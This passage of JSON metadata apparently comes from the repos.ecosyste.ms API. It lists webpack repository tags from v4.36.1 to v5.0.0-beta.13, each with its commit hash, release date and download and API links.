url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de0